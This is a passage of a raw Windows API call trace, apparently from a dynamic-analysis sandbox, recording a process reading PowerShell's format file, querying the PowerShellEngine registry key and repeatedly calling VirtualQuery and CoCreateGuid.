	[0354.069] VirtualQuery (in: lpAddress=0x10b840, lpBuffer=0x10c700, dwLength=0x30 | out: lpBuffer=0x10c700*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.069] VirtualQuery (in: lpAddress=0x10b8d0, lpBuffer=0x10c790, dwLength=0x30 | out: lpBuffer=0x10c790*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.069] VirtualQuery (in: lpAddress=0x10b840, lpBuffer=0x10c700, dwLength=0x30 | out: lpBuffer=0x10c700*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.069] VirtualQuery (in: lpAddress=0x10b8d0, lpBuffer=0x10c790, dwLength=0x30 | out: lpBuffer=0x10c790*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.070] VirtualQuery (in: lpAddress=0x10b840, lpBuffer=0x10c700, dwLength=0x30 | out: lpBuffer=0x10c700*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.070] VirtualQuery (in: lpAddress=0x10b8d0, lpBuffer=0x10c790, dwLength=0x30 | out: lpBuffer=0x10c790*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.070] VirtualQuery (in: lpAddress=0x10b840, lpBuffer=0x10c700, dwLength=0x30 | out: lpBuffer=0x10c700*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.070] VirtualQuery (in: lpAddress=0x10b8d0, lpBuffer=0x10c790, dwLength=0x30 | out: lpBuffer=0x10c790*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.070] VirtualQuery (in: lpAddress=0x10b840, lpBuffer=0x10c700, dwLength=0x30 | out: lpBuffer=0x10c700*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.070] VirtualQuery (in: lpAddress=0x10b8d0, lpBuffer=0x10c790, dwLength=0x30 | out: lpBuffer=0x10c790*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.070] VirtualQuery (in: lpAddress=0x10b840, lpBuffer=0x10c700, dwLength=0x30 | out: lpBuffer=0x10c700*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.071] VirtualQuery (in: lpAddress=0x10b8d0, lpBuffer=0x10c790, dwLength=0x30 | out: lpBuffer=0x10c790*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.071] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.071] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.071] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.071] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.071] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.071] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.072] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.072] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xd886568c, Data2=0x27a8, Data3=0x491b, Data4=([0]=0xb3, [1]=0x38, [2]=0x95, [3]=0x6c, [4]=0xe0, [5]=0x16, [6]=0x7f, [7]=0x1a))) returned 0x0
	[0354.072] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.072] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.072] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.072] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.072] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.073] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.073] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.073] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.073] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.073] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.073] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.073] VirtualQuery (in: lpAddress=0x10b500, lpBuffer=0x10c3c0, dwLength=0x30 | out: lpBuffer=0x10c3c0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.073] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.073] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.074] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.074] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.074] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x417ba5c, Data2=0x8eb4, Data3=0x427c, Data4=([0]=0xbb, [1]=0x7a, [2]=0x21, [3]=0xfe, [4]=0x2a, [5]=0x30, [6]=0x8d, [7]=0xa))) returned 0x0
	[0354.074] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x89f33f11, Data2=0xf8e6, Data3=0x45be, Data4=([0]=0x82, [1]=0x41, [2]=0x8e, [3]=0xf8, [4]=0x14, [5]=0x89, [6]=0x6a, [7]=0x1d))) returned 0x0
	[0354.074] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xee76c42, Data2=0xf94a, Data3=0x43f4, Data4=([0]=0x87, [1]=0x68, [2]=0xa5, [3]=0xd4, [4]=0xc9, [5]=0x2b, [6]=0xf8, [7]=0x7f))) returned 0x0
	[0354.074] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x439be80e, Data2=0x3b26, Data3=0x467e, Data4=([0]=0xa7, [1]=0x2a, [2]=0xfa, [3]=0xdd, [4]=0x3, [5]=0x6d, [6]=0xaa, [7]=0xe8))) returned 0x0
	[0354.075] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x1924e966, Data2=0x5adc, Data3=0x4a8f, Data4=([0]=0xa1, [1]=0xb9, [2]=0xc4, [3]=0xcd, [4]=0xcc, [5]=0x83, [6]=0xab, [7]=0x94))) returned 0x0
	[0354.075] VirtualQuery (in: lpAddress=0x10b610, lpBuffer=0x10c4d0, dwLength=0x30 | out: lpBuffer=0x10c4d0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.075] VirtualQuery (in: lpAddress=0x10b6a0, lpBuffer=0x10c560, dwLength=0x30 | out: lpBuffer=0x10c560*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0354.075] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x20995ef, Data2=0x9fe9, Data3=0x4b43, Data4=([0]=0x83, [1]=0x48, [2]=0x99, [3]=0x8d, [4]=0x89, [5]=0xcb, [6]=0x21, [7]=0xf8))) returned 0x0
	[0354.075] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xa41dc880, Data2=0x490c, Data3=0x4c6d, Data4=([0]=0x86, [1]=0xf0, [2]=0xc, [3]=0x7c, [4]=0xf8, [5]=0x86, [6]=0x7f, [7]=0x68))) returned 0x0
	[0354.075] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x5ce98b22, Data2=0x4819, Data3=0x41e2, Data4=([0]=0x86, [1]=0x7a, [2]=0x52, [3]=0xa1, [4]=0x4a, [5]=0x43, [6]=0x7f, [7]=0xb6))) returned 0x0
	[0354.075] SetErrorMode (uMode=0x1) returned 0x1
	[0354.075] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1cc
	[0354.076] SetErrorMode (uMode=0x1) returned 0x1
	[0354.076] GetFileType (hFile=0x1cc) returned 0x1
	[0354.076] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.077] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.077] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.077] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.077] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.077] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.077] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.077] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.077] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.078] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.078] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.078] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.078] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.078] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.079] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.079] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.079] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.079] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.079] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.079] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.080] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.080] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0xe67, lpOverlapped=0x0) returned 1
	[0354.080] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fe9757, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fe9757*, lpNumberOfBytesRead=0x10cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0354.080] ReadFile (in: hFile=0x1cc, lpBuffer=0x2fea188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2fea188*, lpNumberOfBytesRead=0x10cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0354.080] SetErrorMode (uMode=0x1) returned 0x1
	[0354.080] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10cda0 | out: lpFileInformation=0x10cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0354.080] SetErrorMode (uMode=0x1) returned 0x1
	[0354.080] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ce88 | out: phkResult=0x10ce88*=0x1cc) returned 0x0
	[0354.081] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ce0c, lpData=0x0, lpcbData=0x10ce08*=0x0 | out: lpType=0x10ce0c*=0x1, lpData=0x0, lpcbData=0x10ce08*=0x56) returned 0x0
	[0354.081] CoTaskMemAlloc (cb=0x5a) returned 0x3cc550
	[0354.081] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cddc, lpData=0x3cc550, lpcbData=0x10cdd8*=0x56 | out: lpType=0x10cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10cdd8*=0x56) returned 0x0
	[0354.081] CoTaskMemFree (pv=0x3cc550) 
	[0354.081] RegCloseKey (hKey=0x1cc) returned 0x0
	[0354.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0354.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0354.082] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xcd742310, Data2=0xcb9f, Data3=0x462d, Data4=([0]=0xa6, [1]=0x8d, [2]=0x59, [3]=0x7e, [4]=0xe2, [5]=0xa2, [6]=0xff, [7]=0xc3))) returned 0x0
	[0354.082] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x89f28739, Data2=0x3f0f, Data3=0x4d9d, Data4=([0]=0xa2, [1]=0x7, [2]=0xf7, [3]=0xad, [4]=0x55, [5]=0x70, [6]=0xb1, [7]=0xaf))) returned 0x0
	[0354.082] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x497e71b6, Data2=0x24c7, Data3=0x4575, Data4=([0]=0xa8, [1]=0x31, [2]=0x8b, [3]=0xea, [4]=0xfa, [5]=0xeb, [6]=0x34, [7]=0xa4))) returned 0x0
	[0354.083] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x7f6633c6, Data2=0xf6a6, Data3=0x4dbe, Data4=([0]=0x85, [1]=0x9b, [2]=0x8, [3]=0x8, [4]=0x2d, [5]=0x19, [6]=0x51, [7]=0xcb))) returned 0x0
	[0354.083] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xfaccf652, Data2=0x81c, Data3=0x42cb, Data4=([0]=0xb2, [1]=0xac, [2]=0xa8, [3]=0xfd, [4]=0xd9, [5]=0xc3, [6]=0xb7, [7]=0xd1))) returned 0x0
	[0354.083] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x6d80eb14, Data2=0xd54d, Data3=0x450a, Data4=([0]=0x9f, [1]=0x2c, [2]=0x23, [3]=0xde, [4]=0x6, [5]=0xd9, [6]=0x8, [7]=0xa1))) returned 0x0
	[0354.083] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xdb40761e, Data2=0x9cd2, Data3=0x42ba, Data4=([0]=0x87, [1]=0x58, [2]=0x51, [3]=0xb8, [4]=0x61, [5]=0x75, [6]=0x13, [7]=0x7c))) returned 0x0
	[0354.083] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.084] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xaacf85c, Data2=0xb60b, Data3=0x4c09, Data4=([0]=0xb0, [1]=0x51, [2]=0xed, [3]=0xa4, [4]=0xe4, [5]=0x7a, [6]=0xbd, [7]=0x45))) returned 0x0
	[0354.085] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xd260b391, Data2=0x352e, Data3=0x47aa, Data4=([0]=0x88, [1]=0xb0, [2]=0x33, [3]=0x95, [4]=0xc9, [5]=0x9e, [6]=0xd2, [7]=0x90))) returned 0x0
	[0354.085] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xca753a7, Data2=0xb030, Data3=0x4258, Data4=([0]=0x85, [1]=0x14, [2]=0x74, [3]=0x6f, [4]=0x6a, [5]=0x13, [6]=0xa2, [7]=0x49))) returned 0x0
